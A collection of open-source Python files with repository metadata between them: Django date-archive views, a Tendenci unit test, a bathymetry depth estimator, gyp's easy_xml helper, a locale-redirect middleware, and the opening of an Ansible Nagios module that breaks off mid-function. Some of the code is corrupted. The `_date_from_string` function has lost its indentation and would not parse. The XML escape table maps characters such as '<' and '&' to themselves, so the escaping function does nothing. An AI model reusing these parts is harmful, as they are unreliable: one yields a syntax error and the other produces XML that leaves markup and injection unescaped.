        date_list = self.get_date_list(qs)
        if not self.get_make_object_list():
            # We need this to be a queryset since parent classes introspect it
            # to find information about the model.
            qs = qs.none()
        return (date_list, qs, {
            'year': date,
            'next_year': self.get_next_year(date),
            'previous_year': self.get_previous_year(date),
        })

    def get_make_object_list(self):
        """
        Return `True` if this view should contain the full list of objects in
        the given year.
        """
        return self.make_object_list
class YearArchiveView(MultipleObjectTemplateResponseMixin, BaseYearArchiveView):
    """List of objects published in a given year, rendered via the `_archive_year` template."""
    template_name_suffix = '_archive_year'
class BaseMonthArchiveView(YearMixin, MonthMixin, BaseDateListView):
    """List of objects published in a given month."""
    date_list_period = 'day'

    def get_dated_items(self):
        """Return (date_list, items, extra_context) for this request."""
        date_field = self.get_date_field()
        date = _date_from_string(self.get_year(), self.get_year_format(),
                                 self.get_month(), self.get_month_format())

        # Bound the queryset to [first day of month, first day of next month).
        since = self._make_date_lookup_arg(date)
        until = self._make_date_lookup_arg(self._get_next_month(date))
        qs = self.get_dated_queryset(**{
            '%s__gte' % date_field: since,
            '%s__lt' % date_field: until,
        })
        date_list = self.get_date_list(qs)

        return (date_list, qs, {
            'month': date,
            'next_month': self.get_next_month(date),
            'previous_month': self.get_previous_month(date),
        })
class MonthArchiveView(MultipleObjectTemplateResponseMixin, BaseMonthArchiveView):
    """List of objects published in a given month, rendered via the `_archive_month` template."""
    template_name_suffix = '_archive_month'
class BaseWeekArchiveView(YearMixin, WeekMixin, BaseDateListView):
    """List of objects published in a given week."""
    def get_dated_items(self):
        """Return (date_list, items, extra_context) for this request."""
        year = self.get_year()
        week = self.get_week()
        date_field = self.get_date_field()
        week_format = self.get_week_format()
        # strptime's %W counts Monday-started weeks, %U counts Sunday-started
        # weeks; pair each with the matching %w weekday digit (1=Mon, 0=Sun)
        # so the parsed date lands on the first day of the requested week.
        week_start = {
            '%W': '1',
            '%U': '0',
        }[week_format]
        date = _date_from_string(year, self.get_year_format(),
                                 week_start, '%w',
                                 week, week_format)
        # Bound the queryset to [start of week, start of next week).
        since = self._make_date_lookup_arg(date)
        until = self._make_date_lookup_arg(self._get_next_week(date))
        lookup_kwargs = {
            '%s__gte' % date_field: since,
            '%s__lt' % date_field: until,
        }
        qs = self.get_dated_queryset(**lookup_kwargs)
        # No date_list for week views (first tuple element is None).
        return (None, qs, {
            'week': date,
            'next_week': self.get_next_week(date),
            'previous_week': self.get_previous_week(date),
        })
class WeekArchiveView(MultipleObjectTemplateResponseMixin, BaseWeekArchiveView):
    """List of objects published in a given week, rendered via the `_archive_week` template."""
    template_name_suffix = '_archive_week'
class BaseDayArchiveView(YearMixin, MonthMixin, DayMixin, BaseDateListView):
    """List of objects published on a given day."""

    def get_dated_items(self):
        """Return (date_list, items, extra_context) for this request."""
        date = _date_from_string(self.get_year(), self.get_year_format(),
                                 self.get_month(), self.get_month_format(),
                                 self.get_day(), self.get_day_format())
        return self._get_dated_items(date)

    def _get_dated_items(self, date):
        """
        Do the actual heavy lifting of getting the dated items; this accepts a
        date object so that TodayArchiveView can be trivial.
        """
        qs = self.get_dated_queryset(**self._make_single_date_lookup(date))
        context = {
            'day': date,
            'previous_day': self.get_previous_day(date),
            'next_day': self.get_next_day(date),
            'previous_month': self.get_previous_month(date),
            'next_month': self.get_next_month(date),
        }
        # Day views have no date_list, hence the leading None.
        return (None, qs, context)
class DayArchiveView(MultipleObjectTemplateResponseMixin, BaseDayArchiveView):
    """List of objects published on a given day, rendered via the `_archive_day` template."""
    template_name_suffix = "_archive_day"
class BaseTodayArchiveView(BaseDayArchiveView):
    """List of objects published today."""
    def get_dated_items(self):
        """Return (date_list, items, extra_context) for this request."""
        # Reuse the day-archive machinery with today's (naive local) date.
        return self._get_dated_items(datetime.date.today())
class TodayArchiveView(MultipleObjectTemplateResponseMixin, BaseTodayArchiveView):
    """List of objects published today, rendered via the `_archive_day` template."""
    template_name_suffix = "_archive_day"
class BaseDateDetailView(YearMixin, MonthMixin, DayMixin, DateMixin, BaseDetailView):
    """
    Detail view of a single object on a single date; this differs from the
    standard DetailView by accepting a year/month/day in the URL.
    """
    def get_object(self, queryset=None):
        """Get the object this request displays.

        Raises Http404 when the parsed date is in the future and
        ``allow_future`` is False.
        """
        year = self.get_year()
        month = self.get_month()
        day = self.get_day()
        date = _date_from_string(year, self.get_year_format(),
                                 month, self.get_month_format(),
                                 day, self.get_day_format())
        # Use a custom queryset if provided
        qs = self.get_queryset() if queryset is None else queryset
        # Reject future dates up front, before any filtering is done.
        if not self.get_allow_future() and date > datetime.date.today():
            raise Http404(_(
                "Future %(verbose_name_plural)s not available because "
                "%(class_name)s.allow_future is False."
            ) % {
                'verbose_name_plural': qs.model._meta.verbose_name_plural,
                'class_name': self.__class__.__name__,
            })
        # Filter down a queryset from self.queryset using the date from the
        # URL. This'll get passed as the queryset to DetailView.get_object,
        # which'll handle the 404
        lookup_kwargs = self._make_single_date_lookup(date)
        qs = qs.filter(**lookup_kwargs)
        return super().get_object(queryset=qs)
class DateDetailView(SingleObjectTemplateResponseMixin, BaseDateDetailView):
    """
    Detail view of a single object on a single date; this differs from the
    standard DetailView by accepting a year/month/day in the URL.
    Rendered via the `_detail` template.
    """
    template_name_suffix = '_detail'
def _date_from_string(year, year_format, month='', month_format='', day='', day_format='', delim='__'):
"""
Get a datetime.date object given a format string and a year, month, and day
(only year is mandatory). Raise a 404 for an invalid date.
"""
format = year_format + delim + month_format + delim + day_format
datestr = year + delim + month + delim + day
try:
return datetime.datetime.strptime(datestr, format).date()
except ValueError:
raise Http404(_("Invalid date string '%(datestr)s' given format '%(format)s'") % {
'datestr': datestr,
'format': format,
})
def _get_next_prev(generic_view, date, is_previous, period):
    """
    Get the next or the previous valid date. The idea is to allow links on
    month/day views to never be 404s by never providing a date that'll be
    invalid for the given view.
    This is a bit complicated since it handles different intervals of time,
    hence the coupling to generic_view.
    However in essence the logic comes down to:
    * If allow_empty and allow_future are both true, this is easy: just
      return the naive result (just the next/previous day/week/month,
      regardless of object existence.)
    * If allow_empty is true, allow_future is false, and the naive result
      isn't in the future, then return it; otherwise return None.
    * If allow_empty is false and allow_future is true, return the next
      date *that contains a valid object*, even if it's in the future. If
      there are no next objects, return None.
    * If allow_empty is false and allow_future is false, return the next
      date that contains a valid object. If that date is in the future, or
      if there are no next objects, return None.
    """
    date_field = generic_view.get_date_field()
    allow_empty = generic_view.get_allow_empty()
    allow_future = generic_view.get_allow_future()
    # Resolve the period-specific helpers on the view, e.g.
    # _get_current_month / _get_next_month when period == 'month'.
    get_current = getattr(generic_view, '_get_current_%s' % period)
    get_next = getattr(generic_view, '_get_next_%s' % period)
    # Bounds of the current interval
    start, end = get_current(date), get_next(date)
    # If allow_empty is True, the naive result will be valid
    if allow_empty:
        if is_previous:
            # Step back one day from the interval start, then snap to the
            # start of that previous period.
            result = get_current(start - datetime.timedelta(days=1))
        else:
            result = end
        if allow_future or result <= timezone_today():
            return result
        else:
            return None
    # Otherwise, we'll need to go to the database to look for an object
    # whose date_field is at least (greater than/less than) the given
    # naive result
    else:
        # Construct a lookup and an ordering depending on whether we're doing
        # a previous date or a next date lookup.
        if is_previous:
            lookup = {'%s__lt' % date_field: generic_view._make_date_lookup_arg(start)}
            ordering = '-%s' % date_field
        else:
            lookup = {'%s__gte' % date_field: generic_view._make_date_lookup_arg(end)}
            ordering = date_field
        # Filter out objects in the future if appropriate.
        if not allow_future:
            # Fortunately, to match the implementation of allow_future,
            # we need __lte, which doesn't conflict with __lt above.
            if generic_view.uses_datetime_field:
                now = timezone.now()
            else:
                now = timezone_today()
            lookup['%s__lte' % date_field] = now
        qs = generic_view.get_queryset().filter(**lookup).order_by(ordering)
        # Snag the first object from the queryset; if it doesn't exist that
        # means there's no next/previous link available.
        try:
            result = getattr(qs[0], date_field)
        except IndexError:
            return None
        # Convert datetimes to dates in the current time zone.
        if generic_view.uses_datetime_field:
            if settings.USE_TZ:
                result = timezone.localtime(result)
            result = result.date()
        # Return the first day of the period.
        return get_current(result)
def timezone_today():
    """Return the current date in the active time zone."""
    if not settings.USE_TZ:
        return datetime.date.today()
    return timezone.localdate()
|
bsd-3-clause
|
alirizakeles/tendenci
|
tendenci/apps/directories/tests.py
|
1
|
1387
|
"""
This file demonstrates two different styles of tests (one doctest and one
unittest). These will both pass when you run "manage.py test".
Replace these with more appropriate tests for your application.
"""
from django.test import TestCase, Client
from django.contrib.auth.models import User
from tendenci.apps.directories.models import Directory
class DirectoryTest(TestCase):
    def setUp(self):
        # Fixtures for the suite: a test client, a blank directory
        # instance, and a saved, active admin user.
        self.client = Client()
        self.directory = Directory()
        self.user = User(username='admin')
        self.user.set_password('google')
        self.user.is_active = True
        self.user.save()

    def tearDown(self):
        # Drop the fixture references.
        self.client = None
        self.directory = None
        self.user = None

    def test_save(self):
        # Populate every required field, then save and confirm the
        # database assigned a (long) integer primary key.
        attrs = {
            'headline': 'Unit Testing',
            'summary': 'Unit Testing',
            'creator': self.user,
            'creator_username': self.user.username,
            'owner': self.user,
            'owner_username': self.user.username,
            'status': True,
            'status_detail': 'active',
            'enclosure_length': 0,
            'timezone': 'America/Chicago',
        }
        for name, value in attrs.items():
            setattr(self.directory, name, value)
        self.directory.save()
        self.assertEquals(type(self.directory.id), long)
|
gpl-3.0
|
jkibele/OpticalRS
|
OpticalRS/DepthEstimator.py
|
1
|
9986
|
# -*- coding: utf-8 -*-
"""
DepthEstimator
==============
Code for handling required data and producing depth estimates from multispectral
satellite imagery. KNN (Kibele and Shears, In Review) and linear methods
(Lyzenga et al., 2006) are currently supported.
References
----------
Kibele, J., Shears, N.T., In Press. Non-parametric empirical depth regression
for bathymetric mapping in coastal waters. IEEE Journal of Selected Topics in
Applied Earth Observations and Remote Sensing.
Lyzenga, D.R., Malinas, N.P., Tanis, F.J., 2006. Multispectral bathymetry using
a simple physically based algorithm. Geoscience and Remote Sensing, IEEE
Transactions on 44, 2251–2259. doi:10.1109/TGRS.2006.872909
"""
from RasterDS import RasterDS
from ArrayUtils import mask3D_with_2D, equalize_array_masks, equalize_band_masks
import KNNDepth
from Lyzenga2006 import dark_pixel_array, fit_and_predict, deep_water_means
import numpy as np
from sklearn.cross_validation import train_test_split
class DepthEstimator(object):
    """
    Once initialized, this object can do a bunch of tasks related to depth
    estimation.
    Parameters
    ----------
    img : OpticalRS.RasterDS, numpy image array, or file path to image
        This is the multispectral image for which depth is to be estimated.
    known_depths : OpticalRS.RasterDS, numpy image array, or file path to image
        A raster of known depths.
    Notes
    -----
    Assumptions:
    - size of known_depths array = size of a single band of img
    - unmasked known_depths pixels are a subset of unmasked img pixels
    """
    def __init__(self,img,known_depths):
        self.img_original = img
        self.imrds = None
        # `imlevel` records how the image was supplied: the array's ndim
        # (3 = (R,C,bands), 2 = flat (pixels,bands)) or 4 for a RasterDS.
        try:
            self.imlevel = img.ndim
        except AttributeError:
            if type(img).__name__ == 'RasterDS':
                self.imlevel = 4
                self.imrds = img
            else:
                # next line should raise exception if `img` can't make RasterDS
                self.imrds = RasterDS(img)
                self.imlevel = 4
        self.known_original = known_depths
        # Mirror the same three-way handling for the depth raster.
        if type(self.known_original).__name__=='RasterDS':
            self.kdrds = known_depths
        elif np.ma.isMaskedArray(self.known_original):
            self.kdrds = None
        else:
            self.kdrds = RasterDS(self.known_original)
        self.known_depth_arr = self.__known_depth_arr()
        self.imarr = self.__imarr()
        self.__mask_depths_with_no_image()
        self.nbands = self.imarr_flat.shape[-1]
        # Check that the numbers of pixels are compatible
        # NOTE(review): under Python 3 this `/` is true division, so impix
        # is a float; the equality check still holds when counts match.
        impix = self.imarr_flat.size / self.nbands
        dpix = self.known_depth_arr_flat.size
        errstr = "{} image pixels and {} depth pixels. Need the same number of pixels."
        assert impix == dpix, errstr.format(impix,dpix)
    def __imarr(self):
        """
        Return 3D (R,C,nBands) image array if possible. If only 2D
        (pixels,nBands) array is available, return `None`. Returned array will
        be np.ma.MaskedArray type even if no pixels are masked.
        """
        # Cache on first access: self.imarr exists only after this has run.
        try:
            self.imarr
        except AttributeError:
            if self.imlevel == 4:
                arr = np.ma.masked_invalid(self.imrds.band_array)
                self.imarr = arr
            elif self.imlevel == 3:
                arr = np.ma.masked_invalid(self.img_original)
                self.imarr = arr
            else: # level 2
                self.imarr = None
        return self.imarr
    def __known_depth_arr(self):
        """
        Return a 2D (R,C) masked array of known depths if possible. If flat
        array was handed in instead, return `None`.
        """
        # Same caching idiom as __imarr: probe the attribute first.
        try:
            self.known_depth_arr
        except AttributeError:
            if self.kdrds:
                arr = self.kdrds.band_array.squeeze()
                self.known_depth_arr = np.ma.masked_invalid(arr)
            elif isinstance(self.known_original,np.ndarray):
                arr = self.known_original.squeeze()
                if arr.ndim > 1:
                    self.known_depth_arr = np.ma.masked_invalid(arr)
                else:
                    self.known_depth_arr = None
            else:
                # I can't think of a case where we'd get here but...
                self.known_depth_arr = None
        return self.known_depth_arr
    def __mask_depths_with_no_image(self):
        """
        Mask depths that have no corresponding pixels. Only works for non-flat
        arrays.
        """
        if np.ma.is_masked(self.imarr) and np.ma.is_masked(self.known_depth_arr):
            # I'm assuming all image bands have the same mask. ...they should.
            immask = self.imarr[...,0].mask
            self.known_depth_arr = np.ma.masked_where(immask, self.known_depth_arr)
    @property
    def known_depth_arr_flat(self):
        # Flattened depths; falls back to the raw input when no 2D array.
        if np.ma.isMA(self.known_depth_arr):
            return self.known_depth_arr.ravel()
        else:
            return self.known_original
    @property
    def imarr_flat(self):
        """
        Return all the image pixels in (pixels,bands) shape.
        """
        if self.imlevel > 2:
            return self.imarr.reshape(-1,self.imarr.shape[-1])
        else:
            return self.img_original
    @property
    def imarr_compressed(self):
        """
        Return unmasked pixels in (pixels,bands) shape.
        """
        return self.imarr_flat.compressed().reshape(-1,self.nbands)
    @property
    def known_imarr(self):
        """
        Return 3D (R,C,nBands) image array with pixels masked where no known
        depth is available. If no 3D image array is available, return `None`.
        """
        if np.ma.isMA(self.imarr) and np.ma.isMA(self.known_depth_arr):
            return mask3D_with_2D(self.imarr,self.known_depth_arr.mask)
        else:
            return None
    @property
    def known_imarr_flat(self):
        """
        The flattend (pix,bands) image array with all pixels of unknown depth
        masked.
        """
        if np.ma.isMA(self.known_imarr):
            return self.known_imarr.reshape(-1,self.nbands)
        else:
            # Broadcast the 1-band depth mask across all image bands.
            mask1b = self.known_depth_arr_flat.mask
            mask = np.repeat(np.atleast_2d(mask1b).T,self.nbands,1)
            return np.ma.masked_where(mask,self.imarr_flat)
    def training_split(self,train_size=0.4,random_state=0):
        """
        Split your `DepthEstimator` into training and test subsets. This is a
        wrapper on the scikit-learn `cross_validation.train_test_split`. More
        info: http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.train_test_split.html
        Parameters
        ----------
        train_size : float, int, or None (default is 0.4)
            If float, should be between 0.0 and 1.0 and represent the
            proportion of the dataset to include in the train split. If int,
            represents the absolute number of train samples. If None, the value
            is automatically set to 0.75.
        random_state : int or RandomState
            Pseudo-random number generator state used for random sampling.
        Returns
        -------
        (train_DE,test_DE) : tuple of DepthEstimators
            Two `DepthEstimator` objects made with compressed and flattened
            arrays. Suitable for training and/or testing depth estimators but
            not for producing images.
        """
        im_train, im_test, dep_train, dep_test = train_test_split(
            self.known_imarr_flat, self.known_depth_arr_flat,
            train_size=train_size,random_state=random_state)
        return DepthEstimator(im_train,dep_train),DepthEstimator(im_test,dep_test)
    def knn_depth_model(self,k=5,weights='uniform',metric='minkowski',
                        n_jobs=4, **kwargs):
        """
        Return a trained KNN depth model. See `OpticalRS.KNNDepth.train_model`
        for more information. This is really just a wrapper over the
        KNeighborsRegressor model in scikit-learn.
        """
        return KNNDepth.train_model(self.known_imarr_flat.compressed().reshape(-1,self.nbands),
                                    self.known_depth_arr_flat.compressed(),
                                    k=k, weights=weights,
                                    metric=metric, n_jobs=n_jobs, **kwargs)
    def knn_depth_estimation(self,k=5,weights='uniform',
                             metric='minkowski',n_jobs=4, **kwargs):
        """
        Train a KNN regression model with `known_depths` and corresponding
        pixels from `img`. Then use that model to predict depths for all pixels
        in `img`. Return a single band array of estimated depths.
        """
        # Start from one band's mask/shape, then overwrite unmasked cells.
        out = self.imarr[...,0].copy()
        knnmodel = self.knn_depth_model(k=k, weights=weights,
                                        metric=metric, n_jobs=n_jobs, **kwargs)
        ests = knnmodel.predict(self.imarr_compressed)
        out[~out.mask] = ests
        return out
    def lyzenga_depth_estimation(self, Rinf=None, bands=None, n_std=0,
                                 n_jobs=4):
        """
        This will implement the linear depth estimation method described in
        Lyzenga et al. 2006. This doc string needs a bit more detail but I don't
        have time right now. Check `OpticalRS.Lyzenga2006` for more detail. This
        method just wraps some of the code from that module to make it easier to
        run.
        """
        if bands is None:
            bands = self.nbands
        if Rinf is None:
            Rinf = deep_water_means(self.imarr[...,:bands], n_std=n_std)
        X = np.ma.log(self.imarr[...,:bands] - Rinf)
        X = equalize_band_masks(X)
        # need to re-equalize, might have lost pixels in log transform
        Xtrain, deparr = equalize_array_masks(X, self.known_depth_arr)
        return fit_and_predict(Xtrain, deparr, X, n_jobs=n_jobs)
|
bsd-3-clause
|
marcusramberg/dotfiles
|
link/hammerspoon/hs/node_modules/node-gyp/gyp/pylib/gyp/easy_xml.py
|
1558
|
4945
|
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import os
def XmlToString(content, encoding='utf-8', pretty=False):
  """ Constructs an XML string from a structured content specification.
  Visual Studio files have a lot of pre-defined structures. This function makes
  it easy to represent these structures as Python data structures, instead of
  having to create a lot of function calls.
  Each XML element of the content is represented as a list composed of:
  1. The name of the element, a string,
  2. The attributes of the element, a dictionary (optional), and
  3+. The content of the element, if any. Strings are simple text nodes and
      lists are child elements.
  Example 1:
      <test/>
  becomes
      ['test']
  Example 2:
      <myelement a='value1' b='value2'>
         <childtype>This is</childtype>
         <childtype>it!</childtype>
      </myelement>
  becomes
      ['myelement', {'a':'value1', 'b':'value2'},
         ['childtype', 'This is'],
         ['childtype', 'it!'],
      ]
  Args:
    content:  The structured content to be converted.
    encoding: The encoding to report on the first XML line.
    pretty: True if we want pretty printing with indents and new lines.
  Returns:
    The XML content as a string.
  """
  # We create a huge list of all the elements of the file.
  xml_parts = ['<?xml version="1.0" encoding="%s"?>' % encoding]
  if pretty:
    xml_parts.append('\n')
  _ConstructContentList(xml_parts, content, pretty)
  # Convert it to a string
  return ''.join(xml_parts)
def _ConstructContentList(xml_parts, specification, pretty, level=0):
  """ Appends the XML parts corresponding to the specification.

  Args:
    xml_parts: A list of XML parts to be appended to.
    specification: The specification of the element. See EasyXml docs.
    pretty: True if we want pretty printing with indents and new lines.
    level: Indentation level, used only when pretty printing.
  """
  # The first item in a specification is the name of the element.
  if pretty:
    indentation = ' ' * level
    new_line = '\n'
  else:
    indentation = ''
    new_line = ''
  name = specification[0]
  if not isinstance(name, str):
    raise Exception('The first item of an EasyXml specification should be '
                    'a string. Specification was ' + str(specification))
  xml_parts.append(indentation + '<' + name)
  # Optionally in second position is a dictionary of the attributes.
  rest = specification[1:]
  if rest and isinstance(rest[0], dict):
    # dict.items() (not the Python-2-only iteritems) keeps this working on
    # both Python 2 and Python 3.
    for at, val in sorted(rest[0].items()):
      xml_parts.append(' %s="%s"' % (at, _XmlEscape(val, attr=True)))
    rest = rest[1:]
  if rest:
    xml_parts.append('>')
    # all() replaces the former reduce() call: reduce is not a builtin on
    # Python 3, and all() short-circuits and reads more clearly.
    all_strings = all(isinstance(y, str) for y in rest)
    multi_line = not all_strings
    if multi_line and new_line:
      xml_parts.append(new_line)
    for child_spec in rest:
      # If it's a string, append a text node.
      # Otherwise recurse over that child definition
      if isinstance(child_spec, str):
        xml_parts.append(_XmlEscape(child_spec))
      else:
        _ConstructContentList(xml_parts, child_spec, pretty, level + 1)
    if multi_line and indentation:
      xml_parts.append(indentation)
    xml_parts.append('</%s>%s' % (name, new_line))
  else:
    xml_parts.append('/>%s' % new_line)
def WriteXmlIfChanged(content, path, encoding='utf-8', pretty=False,
                      win32=False):
  """ Writes the XML content to disk, touching the file only if it has changed.

  Args:
    content: The structured content to be written.
    path: Location of the file.
    encoding: The encoding to report on the first line of the XML file.
    pretty: True if we want pretty printing with indents and new lines.
    win32: True to convert LF line endings to CRLF on non-Windows hosts.
  """
  xml_string = XmlToString(content, encoding, pretty)
  if win32 and os.linesep != '\r\n':
    xml_string = xml_string.replace('\n', '\r\n')
  try:
    xml_string = xml_string.encode(encoding)
  except Exception:
    # Python 2 fallback: decode as latin-1 first, then encode as requested.
    xml_string = unicode(xml_string, 'latin-1').encode(encoding)

  # Get the old content; a missing or unreadable file counts as "changed".
  # `with` guarantees the handle is closed (the old code leaked it), and
  # IOError is the specific error open/read raise here - no bare except.
  try:
    with open(path, 'r') as f:
      existing = f.read()
  except IOError:
    existing = None

  # It has changed, write it
  if existing != xml_string:
    with open(path, 'w') as f:
      f.write(xml_string)
_xml_escape_map = {
'"': '"',
"'": ''',
'<': '<',
'>': '>',
'&': '&',
'\n': '
',
'\r': '
',
}
_xml_escape_re = re.compile(
"(%s)" % "|".join(map(re.escape, _xml_escape_map.keys())))
def _XmlEscape(value, attr=False):
  """ Escape a string for inclusion in XML text or attribute content."""
  def _substitute(match):
    token = match.group(0)
    # Single quotes are legal inside double-quoted attribute values,
    # so leave them untouched when escaping an attribute.
    if attr and token == "'":
      return token
    return _xml_escape_map[token]
  return _xml_escape_re.sub(_substitute, value)
|
mit
|
liu21st/masterfirefoxos
|
masterfirefoxos/base/middleware.py
|
2
|
2023
|
from django.conf import settings
from django.http import HttpResponseRedirect
class NonExistentLocaleRedirectionMiddleware(object):
    """Redirect to the 'en' version of a page if translation does not exist.

    Requests for a locale other than 'en' are redirected to the 'en'
    version of the same page unless the locale is listed for the requested
    documentation version in settings.VERSIONS_LOCALE_MAP.

    Authenticated users (i.e. staff) are never redirected, so unreleased
    translations can be reviewed in place before release.
    """
    def process_request(self, request):
        # Staff get to see untranslated pages as-is.
        if hasattr(request, 'user') and request.user.is_authenticated():
            return
        # English pages always exist; nothing to do.
        if request.path.startswith('/en/'):
            return
        url_breakdown = request.path.split('/')
        try:
            locale = url_breakdown[1]
            version_slug = url_breakdown[2]
        except IndexError:
            # LocaleMiddleware runs first and normally guarantees at least
            # three parts after splitting, but play it safe if the url is
            # ever shorter than expected.
            return
        for version, data in settings.VERSIONS_LOCALE_MAP.items():
            if data.get('slug') != version_slug:
                continue
            if locale not in data.get('locales'):
                url_breakdown[1] = 'en'
                params = request.GET.copy()
                params['from-lang'] = locale
                latest = settings.LOCALE_LATEST_VERSION.get(locale)
                if latest:
                    params['latest-version'] = latest['name']
                return HttpResponseRedirect(
                    '?'.join(['/'.join(url_breakdown), params.urlencode()]))
            # Matching version found and the locale is available: no redirect.
            return
|
mpl-2.0
|
mcltn/ansible-modules-extras
|
monitoring/nagios.py
|
39
|
36108
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is largely copied from the Nagios module included in the
# Func project. Original copyright follows:
#
# func-nagios - Schedule downtime and enables/disable notifications
# Copyright 2011, Red Hat, Inc.
# Tim Bielawa <[email protected]>
#
# This software may be freely redistributed under the terms of the GNU
# general public license version 2 or any later version.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: nagios
short_description: Perform common tasks in Nagios related to downtime and notifications.
description:
- "The M(nagios) module has two basic functions: scheduling downtime and toggling alerts for services or hosts."
- All actions require the I(host) parameter to be given explicitly. In playbooks you can use the C({{inventory_hostname}}) variable to refer to the host the playbook is currently running on.
- You can specify multiple services at once by separating them with commas, .e.g., C(services=httpd,nfs,puppet).
- When specifying what service to handle there is a special service value, I(host), which will handle alerts/downtime for the I(host itself), e.g., C(service=host). This keyword may not be given with other services at the same time. I(Setting alerts/downtime for a host does not affect alerts/downtime for any of the services running on it.) To schedule downtime for all services on particular host use keyword "all", e.g., C(service=all).
- When using the M(nagios) module you will need to specify your Nagios server using the C(delegate_to) parameter.
version_added: "0.7"
options:
action:
description:
- Action to take.
- servicegroup options were added in 2.0.
- delete_downtime options were added in 2.2.
required: true
choices: [ "downtime", "delete_downtime", "enable_alerts", "disable_alerts", "silence", "unsilence",
"silence_nagios", "unsilence_nagios", "command", "servicegroup_service_downtime",
"servicegroup_host_downtime" ]
host:
description:
- Host to operate on in Nagios.
required: false
default: null
cmdfile:
description:
- Path to the nagios I(command file) (FIFO pipe).
Only required if auto-detection fails.
required: false
default: auto-detected
author:
description:
- Author to leave downtime comments as.
Only usable with the C(downtime) action.
required: false
default: Ansible
comment:
version_added: "2.0"
description:
- Comment for C(downtime) action.
required: false
default: Scheduling downtime
minutes:
description:
- Minutes to schedule downtime for.
- Only usable with the C(downtime) action.
required: false
default: 30
services:
description:
- What to manage downtime/alerts for. Separate multiple services with commas.
C(service) is an alias for C(services).
B(Required) option when using the C(downtime), C(enable_alerts), and C(disable_alerts) actions.
aliases: [ "service" ]
required: true
servicegroup:
version_added: "2.0"
description:
- The Servicegroup we want to set downtimes/alerts for.
B(Required) option when using the C(servicegroup_service_downtime) amd C(servicegroup_host_downtime).
command:
description:
- The raw command to send to nagios, which
should not include the submitted time header or the line-feed
B(Required) option when using the C(command) action.
required: true
author: "Tim Bielawa (@tbielawa)"
'''
EXAMPLES = '''
# set 30 minutes of apache downtime
- nagios: action=downtime minutes=30 service=httpd host={{ inventory_hostname }}
# schedule an hour of HOST downtime
- nagios: action=downtime minutes=60 service=host host={{ inventory_hostname }}
# schedule an hour of HOST downtime, with a comment describing the reason
- nagios: action=downtime minutes=60 service=host host={{ inventory_hostname }}
comment='This host needs disciplined'
# schedule downtime for ALL services on HOST
- nagios: action=downtime minutes=45 service=all host={{ inventory_hostname }}
# schedule downtime for a few services
- nagios: action=downtime services=frob,foobar,qeuz host={{ inventory_hostname }}
# set 30 minutes downtime for all services in servicegroup foo
- nagios: action=servicegroup_service_downtime minutes=30 servicegroup=foo host={{ inventory_hostname }}
# set 30 minutes downtime for all host in servicegroup foo
- nagios: action=servicegroup_host_downtime minutes=30 servicegroup=foo host={{ inventory_hostname }}
# delete all downtime for a given host
- nagios: action=delete_downtime host={{ inventory_hostname }} service=all
# delete all downtime for HOST with a particular comment
- nagios: action=delete_downtime host={{ inventory_hostname }} service=host comment="Planned maintenance"
# enable SMART disk alerts
- nagios: action=enable_alerts service=smart host={{ inventory_hostname }}
# "two services at once: disable httpd and nfs alerts"
- nagios: action=disable_alerts service=httpd,nfs host={{ inventory_hostname }}
# disable HOST alerts
- nagios: action=disable_alerts service=host host={{ inventory_hostname }}
# silence ALL alerts
- nagios: action=silence host={{ inventory_hostname }}
# unsilence all alerts
- nagios: action=unsilence host={{ inventory_hostname }}
# SHUT UP NAGIOS
- nagios: action=silence_nagios
# ANNOY ME NAGIOS
- nagios: action=unsilence_nagios
# command something
- nagios: action=command command='DISABLE_FAILURE_PREDICTION'
'''
import ConfigParser
import types
import time
import os.path
######################################################################
def which_cmdfile():
    """Auto-detect the nagios command file (FIFO pipe) path.

    Scans the known nagios/icinga configuration file locations and returns
    the value of the first ``command_file`` directive found, or ``None``
    when no configuration file yields one.
    """
    locations = [
        # rhel
        '/etc/nagios/nagios.cfg',
        # debian
        '/etc/nagios3/nagios.cfg',
        # older debian
        '/etc/nagios2/nagios.cfg',
        # bsd, solaris
        '/usr/local/etc/nagios/nagios.cfg',
        # groundwork it monitoring
        '/usr/local/groundwork/nagios/etc/nagios.cfg',
        # open monitoring distribution
        '/omd/sites/oppy/tmp/nagios/nagios.cfg',
        # ???
        '/usr/local/nagios/etc/nagios.cfg',
        '/usr/local/nagios/nagios.cfg',
        '/opt/nagios/etc/nagios.cfg',
        '/opt/nagios/nagios.cfg',
        # icinga on debian/ubuntu
        '/etc/icinga/icinga.cfg',
        # icinga installed from source (default location)
        '/usr/local/icinga/etc/icinga.cfg',
    ]
    for path in locations:
        if os.path.exists(path):
            # `with` closes the config file instead of leaking the handle
            # (the old code iterated a bare open() and never closed it).
            with open(path) as cfg:
                for line in cfg:
                    if line.startswith('command_file'):
                        return line.split('=')[1].strip()
    return None
######################################################################
def main():
    """Ansible module entry point: validate parameters and dispatch to Nagios."""
    # Supported values for the 'action' module parameter.
    ACTION_CHOICES = [
        'downtime',
        'delete_downtime',
        'silence',
        'unsilence',
        'enable_alerts',
        'disable_alerts',
        'silence_nagios',
        'unsilence_nagios',
        'command',
        'servicegroup_host_downtime',
        'servicegroup_service_downtime',
    ]

    module = AnsibleModule(
        argument_spec=dict(
            action=dict(required=True, default=None, choices=ACTION_CHOICES),
            author=dict(default='Ansible'),
            comment=dict(default='Scheduling downtime'),
            host=dict(required=False, default=None),
            servicegroup=dict(required=False, default=None),
            minutes=dict(default=30),
            cmdfile=dict(default=which_cmdfile()),
            services=dict(default=None, aliases=['service']),
            command=dict(required=False, default=None),
        )
    )

    action = module.params['action']
    host = module.params['host']
    servicegroup = module.params['servicegroup']
    minutes = module.params['minutes']
    services = module.params['services']
    cmdfile = module.params['cmdfile']
    command = module.params['command']

    def fail_unless_int_minutes():
        # int() already raises for any non-integer value, so the original's
        # follow-up isinstance() check was dead code and has been dropped.
        try:
            int(minutes)
        except Exception:
            module.fail_json(msg='invalid entry for minutes')

    ##################################################################
    # Required args per action:
    #   downtime                 = (minutes, services, host)
    #   delete_downtime          = (services, host)
    #   (un)silence              = (host)
    #   (enable/disable)_alerts  = (services, host)
    #   servicegroup_*_downtime  = (servicegroup, minutes)
    #   command                  = (command)
    #
    # AnsibleModule verifies most parameters; 'minutes' and 'services'
    # are checked manually below.
    ##################################################################
    if action not in ['command', 'silence_nagios', 'unsilence_nagios']:
        if not host:
